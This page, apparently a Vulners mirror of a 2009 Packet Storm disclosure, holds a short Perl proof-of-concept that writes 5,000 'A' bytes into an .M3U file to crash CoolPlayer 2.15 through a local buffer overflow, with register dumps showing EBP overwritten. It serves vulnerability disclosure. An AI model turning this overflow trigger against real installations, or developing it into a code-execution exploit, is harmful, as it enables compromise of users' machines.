Lucene search
K

CoolPlayer 2.15 Crash

🗓️ 04 Sep 2009 00:00:00Reported by d3b4gType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

CoolPlayer 2.15 Local Buffer Overflow PoC exploit via M3U file

Code
`#!/usr/bin/perl  
# Founded By :d3b4g  
# CoolPlayer2.15 (.M3U) Local Buffer Overflow PoC  
# download: http://www.soft32.com/Download/Free/CoolPlayer_215/4-570-1.html  
############################################################  
##EAX 00000001  
##ECX 4ED83DEA  
##EDX 00000000   
##EBX 001226D0 ASCII"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
##ESP 00122428  
##EBP 41414141 EBP is overwritten  
##ESI 00000000  
##EDI 00D1F958  
##EIP 00409D54 coolplay.00409D54  
#############################################################  
my $crash="\x41" x 5000;  
open(myfile,'>>d3b4g.m3u');  
print myfile $crash;  
##############################################################`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Sep 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
29